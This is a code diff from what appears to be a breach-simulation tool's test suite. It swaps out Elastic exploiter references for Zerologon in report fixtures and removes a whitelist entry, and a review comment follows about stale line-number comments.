"exploiter": "ZerologonExploiter",
|
||||||
"info": {
|
"info": {
|
||||||
"display_name": "Elastic search",
|
"display_name": "Zerologon",
|
||||||
"started": "2020-05-11T08:59:38.105Z",
|
"started": "2020-05-11T08:59:38.105Z",
|
||||||
"finished": "2020-05-11T08:59:38.106Z",
|
"finished": "2020-05-11T08:59:38.106Z",
|
||||||
"vulnerable_urls": [],
|
"vulnerable_urls": [],
|
||||||
|
|
|
@ -11,7 +11,7 @@ from monkey_island.cc.services.reporting.exploitations.monkey_exploitation impor
|
||||||
|
|
||||||
def test_get_exploits_used_on_node__2_exploits():
|
def test_get_exploits_used_on_node__2_exploits():
|
||||||
exploits = get_exploits_used_on_node(NODE_DICT)
|
exploits = get_exploits_used_on_node(NODE_DICT)
|
||||||
assert sorted(exploits) == sorted(["Elastic Groovy Exploiter", "Drupal Server Exploiter"])
|
assert sorted(exploits) == sorted(["Zerologon Exploiter", "Drupal Server Exploiter"])
|
||||||
|
|
||||||
|
|
||||||
def test_get_exploits_used_on_node__duplicate_exploits():
|
def test_get_exploits_used_on_node__duplicate_exploits():
|
||||||
|
|
|
@ -110,9 +110,9 @@ NODE_DICT = {
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
"exploitation_result": True,
|
"exploitation_result": True,
|
||||||
"exploiter": "ElasticGroovyExploiter",
|
"exploiter": "ZerologonExploiter",
|
||||||
"info": {
|
"info": {
|
||||||
"display_name": "Elastic search",
|
"display_name": "Zerologon",
|
||||||
"started": datetime.datetime(2021, 2, 19, 9, 0, 15, 16000),
|
"started": datetime.datetime(2021, 2, 19, 9, 0, 15, 16000),
|
||||||
"finished": datetime.datetime(2021, 2, 19, 9, 0, 15, 17000),
|
"finished": datetime.datetime(2021, 2, 19, 9, 0, 15, 17000),
|
||||||
"vulnerable_urls": [],
|
"vulnerable_urls": [],
|
||||||
|
|
|
@ -186,7 +186,6 @@ def test_format_config_for_agent__exploiters(flat_monkey_config):
|
||||||
],
|
],
|
||||||
"vulnerability": [
|
"vulnerability": [
|
||||||
{"name": "DrupalExploiter", "options": {}},
|
{"name": "DrupalExploiter", "options": {}},
|
||||||
{"name": "ElasticGroovyExploiter", "options": {}},
|
|
||||||
{"name": "HadoopExploiter", "options": {}},
|
{"name": "HadoopExploiter", "options": {}},
|
||||||
{"name": "Struts2Exploiter", "options": {}},
|
{"name": "Struts2Exploiter", "options": {}},
|
||||||
{"name": "WebLogicExploiter", "options": {}},
|
{"name": "WebLogicExploiter", "options": {}},
|
||||||
|
|
|
@ -56,7 +56,6 @@ credential_type # unused variable (monkey/monkey_island/cc/services/reporting/i
|
||||||
password_restored # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_report_info.py:23)
|
password_restored # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_report_info.py:23)
|
||||||
SSH # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:30)
|
SSH # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:30)
|
||||||
SAMBACRY # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:31)
|
SAMBACRY # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:31)
|
||||||
ELASTIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:32)
|
|
||||||
STRUTS2 # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:39)
|
STRUTS2 # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:39)
|
||||||
WEBLOGIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:40)
|
WEBLOGIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:40)
|
||||||
HADOOP # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:43)
|
HADOOP # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:43)
|
||||||
|
|
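Review bot: Removing the ELASTIC entry here leaves the remaining location comments stale: the ExploiterDescriptorEnum hunk in this commit deletes three lines (`@ -28,9 +28,6 @@`), so the references for `STRUTS2` (`:39`), `WEBLOGIC` (`:40`) and `HADOOP` (`:43`) presumably now point three lines past the real definitions (`:36`, `:37`, `:40`). These comments are informational only, so nothing breaks, but a reader following them lands on the wrong line; either refresh them or drop the line numbers from the comments if they are not meant to be maintained.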